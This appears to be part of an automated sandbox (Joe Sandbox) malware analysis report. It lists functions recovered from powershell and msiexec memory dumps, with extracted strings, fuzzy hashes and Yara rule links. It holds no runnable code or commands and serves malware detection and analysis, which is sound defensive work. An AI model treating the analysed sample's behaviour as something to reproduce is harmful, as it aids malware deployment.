Function 0078F520 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2059859522.0000000000780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_780000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00d3bfa0b077dce4a986df314c08cd61ab9532a9b7e505c5c8d6efb6ca2db41b
Instruction ID: 3c3690196b4998187432814a0a4e3c27b6571b6549d218b1f0c38807e53e165d
Opcode Fuzzy Hash: 00d3bfa0b077dce4a986df314c08cd61ab9532a9b7e505c5c8d6efb6ca2db41b
Instruction Fuzzy Hash: 04F090B53005108BC6056B28E01946E77A7EFC9632325401BE907C7750DF79DC028BA1

Function 08C70CA3 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2078981046.0000000008C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afc6eaceb4e4534f2bb15cf4e1bf61eddd88f856875cc5b001577871e1178d91
Instruction ID: 4a433a87ab6f68b26fd035a94b146e13dd087fc346f6fb5072cffae2c979b76f
Opcode Fuzzy Hash: afc6eaceb4e4534f2bb15cf4e1bf61eddd88f856875cc5b001577871e1178d91
Instruction Fuzzy Hash: 47F0B435F00608EFCB14CB98D8849AEF7B1FF88320B248659D915A7650CB36AC53CB50

Function 0078FDC9 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2059859522.0000000000780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_780000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eff83f09ab806c9abd1399a84b3094af7fdfe13f05da3ae8baa1cd836955735
Instruction ID: c0778cd7e8767b88831475c40c60d1f5c289c67cfe532e90a9c6d736be3093c7
Opcode Fuzzy Hash: 7eff83f09ab806c9abd1399a84b3094af7fdfe13f05da3ae8baa1cd836955735
Instruction Fuzzy Hash: EAE04874D01108DF8740DF79AD015DDFBF4AB55201B60856AD908D7201E6314651CBD2

Function 0078FDD8 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2059859522.0000000000780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_780000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction ID: 843ef69fd2fec9bf48aaf0279007fb03ec577a5fb65406b77b1b5b0dff15d3c8
Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction Fuzzy Hash: A1D067B0D042099F8780EFBDC94156EFBF4EB59200F6085BEC919E7311E7329A128BD1

Non-executed Functions

Function 06F1EFE5 Relevance: 14.0, Strings: 11, Instructions: 294COMMON

Download Yara Rule

Strings

tPq, xrefs: 06F1F11D
(q, xrefs: 06F1F1D2
tPq, xrefs: 06F1F218
tPq, xrefs: 06F1F20C
4'q, xrefs: 06F1F2E4
$q, xrefs: 06F1F03D
tPq, xrefs: 06F1F111
(q, xrefs: 06F1F240
(q, xrefs: 06F1F275
4'q, xrefs: 06F1F2F0
(q, xrefs: 06F1F236

Memory Dump Source

Source File: 00000002.00000002.2074296046.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$tPq$tPq$tPq$tPq$$q$(q$(q$(q$(q
API String ID: 0-1570892024
Opcode ID: 49c40c821e050150e0688dc946b3f0e01a5f87eab5728d82809c5c20e7daf2ae
Instruction ID: 5b70df347e598e877814ddb9df443ac22f73dae9e98e249a0ab0a14c24e48482
Opcode Fuzzy Hash: 49c40c821e050150e0688dc946b3f0e01a5f87eab5728d82809c5c20e7daf2ae
Instruction Fuzzy Hash: 01A10631F012559FEB649F64C85576ABBE2BF88391F288059EC05AF391DB31DC41CBA2

Function 06F1AB70 Relevance: 12.9, Strings: 10, Instructions: 391COMMON

Download Yara Rule

Strings

4'q, xrefs: 06F1AF9B
4'q, xrefs: 06F1AFA7
$q, xrefs: 06F1AF76
4'q, xrefs: 06F1AD2D
$q, xrefs: 06F1AE4D
$q, xrefs: 06F1AF66
tPq, xrefs: 06F1AEF7
$q, xrefs: 06F1AE69
4'q, xrefs: 06F1AD21
tPq, xrefs: 06F1AEEB

Memory Dump Source

Source File: 00000002.00000002.2074296046.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q$tPq$tPq$$q$$q$$q$$q
API String ID: 0-3456696661
Opcode ID: 8f4890c6a5e075a85f53b1f60292a0c1ecbd72c48d90f7bfc5c69a87b29c811a
Instruction ID: 9c34e71d78eb41e84389beceb9ca49a100effa32b8f347b6e58b09e08b32cd0e
Opcode Fuzzy Hash: 8f4890c6a5e075a85f53b1f60292a0c1ecbd72c48d90f7bfc5c69a87b29c811a
Instruction Fuzzy Hash: 33D12831F01215DFE7659B69D41476ABBE2AF88391F14C0AAE815CF291DB32DD01CBA1

Function 06F1E76D Relevance: 11.5, Strings: 9, Instructions: 209COMMON

Download Yara Rule

Strings

d%q, xrefs: 06F1E94B
d%q, xrefs: 06F1E955
4'q, xrefs: 06F1E9BF
d%q, xrefs: 06F1E8E7
tPq, xrefs: 06F1E92D
$q, xrefs: 06F1E808
tPq, xrefs: 06F1E921
4'q, xrefs: 06F1E9CB
d%q, xrefs: 06F1E98A

Memory Dump Source

Source File: 00000002.00000002.2074296046.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$d%q$d%q$d%q$d%q$tPq$tPq$$q
API String ID: 0-328666906
Opcode ID: 6dda1c706af40c7b25e452bf158fe6d488321df72109c206f7814917fb415e86
Instruction ID: aa3e48194c54f1943e70528ff10420dfea96ed2192394673984b7ec573541e0a
Opcode Fuzzy Hash: 6dda1c706af40c7b25e452bf158fe6d488321df72109c206f7814917fb415e86
Instruction Fuzzy Hash: 27711831F10215DFEBA49F65D82077ABBA2BF88290F18846ADC069F385DB31DC41C7A1

Function 06F116D0 Relevance: 9.2, Strings: 7, Instructions: 491COMMON

Download Yara Rule

Strings

$q, xrefs: 06F116E2
tPq, xrefs: 06F1174D
$q, xrefs: 06F11714
$q, xrefs: 06F11708
4'q, xrefs: 06F11937
4'q, xrefs: 06F11941
tPq, xrefs: 06F11759

Memory Dump Source

Source File: 00000002.00000002.2074296046.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$tPq$tPq$$q$$q$$q
API String ID: 0-2432477355
Opcode ID: f4c3f2ecec66db528b6c99ae7218fe05358064d9c9f40b35dbe84ecc01467200
Instruction ID: 5e376e664e68051c0e66e789b5cc73d11c879794f6a3f650ee8eff16c5e03760
Opcode Fuzzy Hash: f4c3f2ecec66db528b6c99ae7218fe05358064d9c9f40b35dbe84ecc01467200
Instruction Fuzzy Hash: F8F14732F042159FEB64DB6994107AABBE2AFC52A1F14807ADA45CF341DB32CC45C7A2

Function 06F10918 Relevance: 9.1, Strings: 7, Instructions: 320COMMON

Download Yara Rule

Strings

tPq, xrefs: 06F10B65
$q, xrefs: 06F10AFA
$q, xrefs: 06F10B2C
tPq, xrefs: 06F10B71
$q, xrefs: 06F10B20
4'q, xrefs: 06F10A27
4'q, xrefs: 06F10A1B

Memory Dump Source

Source File: 00000002.00000002.2074296046.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$tPq$tPq$$q$$q$$q
API String ID: 0-2432477355
Opcode ID: e6094ca13e6bc75f011d8317f117f84c77b15f49366e87d9aedad017f9c18706
Instruction ID: 7e92e07ea6f31ec5db001f51c2366c067a5cf943786009975b125bdd0d72cc2b
Opcode Fuzzy Hash: e6094ca13e6bc75f011d8317f117f84c77b15f49366e87d9aedad017f9c18706
Instruction Fuzzy Hash: 73A18B32F043559FE7659A6AD81476ABBA1AFC5390B18806BD845CF392DF32CC81C7A1

Function 06F1A488 Relevance: 7.9, Strings: 6, Instructions: 432COMMON

Download Yara Rule

Strings

4'q, xrefs: 06F1A8F3
4'q, xrefs: 06F1A8FF
4'q, xrefs: 06F1A756
4'q, xrefs: 06F1A760
4'q, xrefs: 06F1A5C7
4'q, xrefs: 06F1A5BD

Memory Dump Source

Source File: 00000002.00000002.2074296046.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q$4'q$4'q
API String ID: 0-1794337482
Opcode ID: 1a9ea0867ec5b83b9e8ff1d2b9a2652b6cc0a8146b24e539230bef5ee3e80c1f
Instruction ID: 6bb75ab62e99eed5f3dda6e4dae5ee757f8b6d6b703b9cb1e41ac2f9eb73aadd
Opcode Fuzzy Hash: 1a9ea0867ec5b83b9e8ff1d2b9a2652b6cc0a8146b24e539230bef5ee3e80c1f
Instruction Fuzzy Hash: FEE13B31F06319CFDB658B69941476ABBB2AFC52A1B25C0ABC405CF255DB32CC41C7E2

Function 06F1DD80 Relevance: 7.7, Strings: 6, Instructions: 214COMMON

Download Yara Rule

Strings

$q, xrefs: 06F1DE26
$q, xrefs: 06F1DF96
$q, xrefs: 06F1DE81
4'q, xrefs: 06F1DE9F
$q, xrefs: 06F1DE71
4'q, xrefs: 06F1DEAB

Memory Dump Source

Source File: 00000002.00000002.2074296046.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$$q$$q$$q$$q
API String ID: 0-1538229613
Opcode ID: e3f99d085b8fb121c3837e6d04743d8353fb7558ee8c064769863ca639633531
Instruction ID: fba4f5942e13b564c8d2062b7fd4a56db20c09490f016a32cc7dfce3b0801e72
Opcode Fuzzy Hash: e3f99d085b8fb121c3837e6d04743d8353fb7558ee8c064769863ca639633531
Instruction Fuzzy Hash: F9610732F04219DFDB649E29D4047AABBB2AF85392F18C46AE815CF251DB31DA41CBD1

Function 06F15690 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

$q, xrefs: 06F156E7
$q, xrefs: 06F1574C
$q, xrefs: 06F15740
4'q, xrefs: 06F1579E
4'q, xrefs: 06F157AA

Memory Dump Source

Source File: 00000002.00000002.2074296046.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$$q$$q$$q
API String ID: 0-170447905
Opcode ID: 5ab770997245bb1716150677c6bbdc196590a39f2b0d6f1dff61ab9fa505bac2
Instruction ID: 68cb9e4d03559932f00ce3ddd3e5df9e810b0183df3ce6a4c49b2c0aba9749e4
Opcode Fuzzy Hash: 5ab770997245bb1716150677c6bbdc196590a39f2b0d6f1dff61ab9fa505bac2
Instruction Fuzzy Hash: DB511775F14309DFDB658F299841266BBF2AFC52A0B29C0ABD815CF291DB35C805CB91

Function 06F10538 Relevance: 6.4, Strings: 5, Instructions: 148COMMON

Download Yara Rule

Strings

$q, xrefs: 06F10609
4'q, xrefs: 06F10632
$q, xrefs: 06F105FD
4'q, xrefs: 06F10626
$q, xrefs: 06F105C4

Memory Dump Source

Source File: 00000002.00000002.2074296046.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$$q$$q$$q
API String ID: 0-170447905
Opcode ID: 67e3c34a2837baf8218af23bcc1be0723f15e72f694ed445437ed5b9a513743e
Instruction ID: 338f2a0552177d92be65b44e020bdcaccce1cbbd1749b74d38dbb31891d3f7b4
Opcode Fuzzy Hash: 67e3c34a2837baf8218af23bcc1be0723f15e72f694ed445437ed5b9a513743e
Instruction Fuzzy Hash: 9C411931F003199FDB655A3998207BA7F62AFC6290F14846AE905CF291DF31C9C1C7E6

Function 06F1E86E Relevance: 6.3, Strings: 5, Instructions: 85COMMON

Download Yara Rule

Strings

d%q, xrefs: 06F1E94B
d%q, xrefs: 06F1E955
4'q, xrefs: 06F1E9BF
d%q, xrefs: 06F1E8E7
tPq, xrefs: 06F1E921

Memory Dump Source

Source File: 00000002.00000002.2074296046.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$d%q$d%q$d%q$tPq
API String ID: 0-706544200
Opcode ID: c7a4a683b82da95b4526502b6495364f5b2592efab76c1912ca00092178981bb
Instruction ID: 3af061d5e3c4670b9cc36186fa25966e62f30c8ce1c90fd3b511c066e053b2e2
Opcode Fuzzy Hash: c7a4a683b82da95b4526502b6495364f5b2592efab76c1912ca00092178981bb
Instruction Fuzzy Hash: 4631B131F00214DFEBA4DF54D864B69BBB2BF88660B188159ED4AAF349D731DC01CB91

Function 08C80048 Relevance: 5.5, Strings: 4, Instructions: 487COMMON

Download Yara Rule

Strings

4'q, xrefs: 08C801B4
Pim, xrefs: 08C802DB
4'q, xrefs: 08C801C0
Pim, xrefs: 08C802D1

Memory Dump Source

Source File: 00000002.00000002.2079006895.0000000008C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c80000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$Pim$Pim
API String ID: 0-3445111953
Opcode ID: 5b1610da8b630c7461277076272f5bd72ad0db43fcc1c529940f9dda022573cf
Instruction ID: ceb1f3a1ddc2cc2fc2378f8a54f7d856ff978236d7d918050617f7db3bc94239
Opcode Fuzzy Hash: 5b1610da8b630c7461277076272f5bd72ad0db43fcc1c529940f9dda022573cf
Instruction Fuzzy Hash: 5802BE30B40A19DFDB24EF95C454AAABBB2BF8931AF14C16DD8059B341CB31ED46CB91

Function 06F1E038 Relevance: 5.5, Strings: 4, Instructions: 484COMMON

Download Yara Rule

Strings

(oq, xrefs: 06F1E11E
(oq, xrefs: 06F1E461
(oq, xrefs: 06F1E471
(oq, xrefs: 06F1E12E

Memory Dump Source

Source File: 00000002.00000002.2074296046.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID: (oq$(oq$(oq$(oq
API String ID: 0-3853041632
Opcode ID: 221f49ee72cfff65bf0dcb9325aec54488788728225ef33c105ce14525fa3885
Instruction ID: ba1b268014e8b45767d5a4cacb56ff99e858c0b760b4b59080f09183f74adc7b
Opcode Fuzzy Hash: 221f49ee72cfff65bf0dcb9325aec54488788728225ef33c105ce14525fa3885
Instruction Fuzzy Hash: 68F12631F04345DFEB659F69C804BAABBA2BF85390F14846AED45CF291DB32D841C7A1

Function 08C8345A Relevance: 5.3, Strings: 4, Instructions: 324COMMON

Download Yara Rule

Strings

tPq, xrefs: 08C836B8
tPq, xrefs: 08C836C4
tPq, xrefs: 08C835A3
tPq, xrefs: 08C83597

Memory Dump Source

Source File: 00000002.00000002.2079006895.0000000008C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c80000_powershell.jbxd

Similarity

API ID:
String ID: tPq$tPq$tPq$tPq
API String ID: 0-3476066832
Opcode ID: 195789feeb0416d13e575efb7711abcddff7042f6749f2a0348c38df228d1645
Instruction ID: 0a130943e61d76f16911ca651c317a5750ff8c7c729ad0d21f89866dc4717d1b
Opcode Fuzzy Hash: 195789feeb0416d13e575efb7711abcddff7042f6749f2a0348c38df228d1645
Instruction Fuzzy Hash: 13C1D235B00258DFDB11AF69D44066ABBB2FF88656F18946DEC469B380CB31ED42CBD1

Function 06F19A08 Relevance: 5.3, Strings: 4, Instructions: 308COMMON

Download Yara Rule

Strings

4'q, xrefs: 06F19AA2
4'q, xrefs: 06F19A98
4'q, xrefs: 06F19BFD
4'q, xrefs: 06F19C09

Memory Dump Source

Source File: 00000002.00000002.2074296046.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q
API String ID: 0-4210068417
Opcode ID: 9afdcf63b02739edc4a07c6392d00d25e8a4c893267d6dfd2bdf36bcfb3414da
Instruction ID: ba69d46aaefe0420f2dbe9ffd9e8a0dc007b56e94e224fa1dc95614890c6eece
Opcode Fuzzy Hash: 9afdcf63b02739edc4a07c6392d00d25e8a4c893267d6dfd2bdf36bcfb3414da
Instruction Fuzzy Hash: 30A15132F043168FE7658B699420367BBE6AFC5291B18807BD945CF241EB71C945C7E2

Function 06F136A0 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$q, xrefs: 06F136B2
$q, xrefs: 06F13708
$q, xrefs: 06F136CE
$q, xrefs: 06F136FC

Memory Dump Source

Source File: 00000002.00000002.2074296046.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q
API String ID: 0-4102054182
Opcode ID: f92f1addc7b776c18b433658f31747a66eb28c1fd1b82b50cda65f224034a800
Instruction ID: 1d964e308cae4970e480744d11aa722f484f886bea8c4456d308c94c2a8b967f
Opcode Fuzzy Hash: f92f1addc7b776c18b433658f31747a66eb28c1fd1b82b50cda65f224034a800
Instruction Fuzzy Hash: EE216833B04305AFFBB4556A9810B27BAD69BC1791F24843BA949CF382DD32C841C360

Function 06F1B1C3 Relevance: 5.1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

Strings

$q, xrefs: 06F1B27B
$q, xrefs: 06F1B297
$q, xrefs: 06F1B237
$q, xrefs: 06F1B253

Memory Dump Source

Source File: 00000002.00000002.2074296046.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q
API String ID: 0-4102054182
Opcode ID: c6d634f65abb31995d2d1c29f4a4ddba47d063a65c1694e692e377f498b2704b
Instruction ID: 3cedaa037b51a1d94f7b4a8a6445a0a3253032ca90999f75681b241209b0ddde
Opcode Fuzzy Hash: c6d634f65abb31995d2d1c29f4a4ddba47d063a65c1694e692e377f498b2704b
Instruction Fuzzy Hash: F721D331E04382CFEBA68F659541279BBB0EF962D0F2940BAD804DF242D731C55AC7A1

Function 06F10309 Relevance: 5.0, Strings: 4, Instructions: 48COMMON

Download Yara Rule

Strings

4'q, xrefs: 06F10373
$q, xrefs: 06F10352
4'q, xrefs: 06F1037F
$q, xrefs: 06F1035E

Memory Dump Source

Source File: 00000002.00000002.2074296046.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$$q$$q
API String ID: 0-3199993180
Opcode ID: f15f128feb35e0fc18eef9fd7c599e5df990c095afc5784b918b5b491b138f37
Instruction ID: 776b4449eceead26e3b24bba72aa9883a390f1cc6ab79580d203ce11278af90e
Opcode Fuzzy Hash: f15f128feb35e0fc18eef9fd7c599e5df990c095afc5784b918b5b491b138f37
Instruction Fuzzy Hash: 1501D611B093964FD76B1275283162A6FB25FC259071E41D7E481DF397CD144D4B83A7

Analysis Process: msiexec.exePID: 1912, Parent PID: 6256COMMON

Executed Functions

Function 0327C147 Relevance: 2.7, Strings: 2, Instructions: 229COMMON

Download Yara Rule

Strings

PHq, xrefs: 0327C400
PHq, xrefs: 0327C3EF

Memory Dump Source

Source File: 00000007.00000002.2660865769.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3270000_msiexec.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: 974d5efa80c6767d0561f5251b4df311850ac4e1456412b0f7dab4e937482de9
Instruction ID: b2a2ad61cdef1482be58bb436190bef3f2cd75bffddacf286eaba5996c753400
Opcode Fuzzy Hash: 974d5efa80c6767d0561f5251b4df311850ac4e1456412b0f7dab4e937482de9
Instruction Fuzzy Hash: D4A1D775E10218DFDB14DFB9D884A9DBBF2BF89310F148069D409AB361DB719981CF50

Function 0327CFA9 Relevance: 2.7, Strings: 2, Instructions: 188COMMON

Download Yara Rule

Strings

PHq, xrefs: 0327D210
PHq, xrefs: 0327D1FF

Memory Dump Source

Source File: 00000007.00000002.2660865769.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3270000_msiexec.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: bdb6a5972d6afabc5e7ce76640e165886a471ca3742eece2b75c1ed95fa43795
Instruction ID: eaa81940657368eb06ac74eaf2db2b49db84a897e62433d7a6a8b93d043ef542
Opcode Fuzzy Hash: bdb6a5972d6afabc5e7ce76640e165886a471ca3742eece2b75c1ed95fa43795
Instruction Fuzzy Hash: 3E81C274E10218CFEB14DFAAD984A9DBBF2BF89300F14D069E419AB365DB749985CF10

Function 0327CCD9 Relevance: 2.7, Strings: 2, Instructions: 188COMMON

Download Yara Rule

Strings

PHq, xrefs: 0327CF40
PHq, xrefs: 0327CF2F

Memory Dump Source

Source File: 00000007.00000002.2660865769.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3270000_msiexec.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: fe3b147a6c5b2453b8edc32237451e10f9e0f0f8778dca4297d21f497388e64b
Instruction ID: 07b38c49c143643a963d8c9262d9755cba5c103d2525a3e39a7d3ad2b79a4488
Opcode Fuzzy Hash: fe3b147a6c5b2453b8edc32237451e10f9e0f0f8778dca4297d21f497388e64b
Instruction Fuzzy Hash: 3781B474E10218DFEB14DFAAD984A9DBBF2BF88300F14C069E419AB365DB749985CF50

Function 0327CA09 Relevance: 2.7, Strings: 2, Instructions: 186COMMON

Download Yara Rule

Strings

PHq, xrefs: 0327CC5F
PHq, xrefs: 0327CC70

Memory Dump Source

Source File: 00000007.00000002.2660865769.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3270000_msiexec.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: cb46d7a83a2f510d9e6b5ed522d635db4728ecaffff61dd6d042de2a1cad114c
Instruction ID: 35e08e3c48353ed05620fe72936f845845fdffdb5e8d28cc7e3d2c04b5bf5a02
Opcode Fuzzy Hash: cb46d7a83a2f510d9e6b5ed522d635db4728ecaffff61dd6d042de2a1cad114c
Instruction Fuzzy Hash: F681B574E10218CFEB14DFAAD884A9DBBF2BF88300F14D069E419AB365DB709985CF50

Function 0327C738 Relevance: 2.7, Strings: 2, Instructions: 186COMMON

Download Yara Rule

Strings

PHq, xrefs: 0327C98F
PHq, xrefs: 0327C9A0

Memory Dump Source

Source File: 00000007.00000002.2660865769.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3270000_msiexec.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: ef555509179a65c7c6632931185a1b4ed1f2adb8cc47c32ffb1bfc7db82631d2
Instruction ID: 65e139ce71f18aa7a33b57173312639e3c39687e22ca1c062c1e0e5c9ec786cd
Opcode Fuzzy Hash: ef555509179a65c7c6632931185a1b4ed1f2adb8cc47c32ffb1bfc7db82631d2
Instruction Fuzzy Hash: 6E81C374E10218DFEB54DFAAD984A9DBBF2BF88300F14C069D819AB365DB709981CF50

Function 0327537B Relevance: 2.6, Strings: 2, Instructions: 150COMMON

Download Yara Rule

Strings

PHq, xrefs: 032755C8
PHq, xrefs: 032755D9

Memory Dump Source

Source File: 00000007.00000002.2660865769.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3270000_msiexec.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: ed1b21ebeab366acc68224df4a30f10daec4912c688a462c88e61b2aa50fc30b
Instruction ID: 1cc8523053cd1cacace25deda58acc8dec8cb691d5eb9d5f5e32f9a290951cdb
Opcode Fuzzy Hash: ed1b21ebeab366acc68224df4a30f10daec4912c688a462c88e61b2aa50fc30b
Instruction Fuzzy Hash: 1D61B474E102089FDB14DFAAD944A9DFBF2BF89300F24C029E819AB365DB749981CF50

Function 03270C8F Relevance: 3.0, Strings: 2, Instructions: 544COMMON

Download Yara Rule

Strings

X0$, xrefs: 03270F3A
LRq, xrefs: 03270F19

Memory Dump Source

Source File: 00000007.00000002.2660865769.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3270000_msiexec.jbxd

Similarity

API ID:
String ID: LRq$X0$
API String ID: 0-3181013156
Opcode ID: f11be36cff77e5a15e4ddaaf21370966f7ffb211ed9e1ee7f42e188c1917a14d
Instruction ID: fdcbf06ebe05ad7e6ea68f3c07dcde94b3f7816e665cbd9e066b334bc7a39b2c
Opcode Fuzzy Hash: f11be36cff77e5a15e4ddaaf21370966f7ffb211ed9e1ee7f42e188c1917a14d
Instruction Fuzzy Hash: EC52D87991021ACFCB64DF24E998B9DBBB2FB48305F1081A5D44AAB354DF35AD85CF80

Function 03270CA0 Relevance: 3.0, Strings: 2, Instructions: 539COMMON

Download Yara Rule

Strings

X0$, xrefs: 03270F3A
LRq, xrefs: 03270F19

Memory Dump Source

Source File: 00000007.00000002.2660865769.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3270000_msiexec.jbxd

Similarity

API ID:
String ID: LRq$X0$
API String ID: 0-3181013156
Opcode ID: 724805258efb1547a5dcea6e15d8011eb7ba37fd9d5050596c55387b5b2610f2
Instruction ID: 7b07da490d92b5623d75d5387413c4d781bee7e30ae5522419141e9355da44b1
Opcode Fuzzy Hash: 724805258efb1547a5dcea6e15d8011eb7ba37fd9d5050596c55387b5b2610f2
Instruction Fuzzy Hash: D452C77991021ACFCB64DF24E998B9DBBB2FB48305F1081A5D44AAB354DF35AD85CF80

Function 03275F38 Relevance: 2.8, Strings: 2, Instructions: 327COMMON

Download Yara Rule

Strings

Hq, xrefs: 03276023
Hq, xrefs: 03276056

Memory Dump Source

Source File: 00000007.00000002.2660865769.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3270000_msiexec.jbxd

Similarity

API ID:
String ID: Hq$Hq
API String ID: 0-925789375
Opcode ID: 9261280a0d969e117b91bba06af7395ca1772df6e206681c8b800e5cd1172772
Instruction ID: e4b1682a4223e3d3481938514166ced1912e9aac7932877ed0b3226d84c5a557
Opcode Fuzzy Hash: 9261280a0d969e117b91bba06af7395ca1772df6e206681c8b800e5cd1172772
Instruction Fuzzy Hash: 36B1DE347246028FDB19DF78C858B6E7BA6FF89200F188569E446CB391DB79CC82C791

Function 032764E0 Relevance: 2.7, Strings: 2, Instructions: 177COMMON

Download Yara Rule

Strings

,q, xrefs: 0327656E
,q, xrefs: 03276578

Memory Dump Source

Source File: 00000007.00000002.2660865769.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3270000_msiexec.jbxd

Similarity

API ID:
String ID: ,q$,q
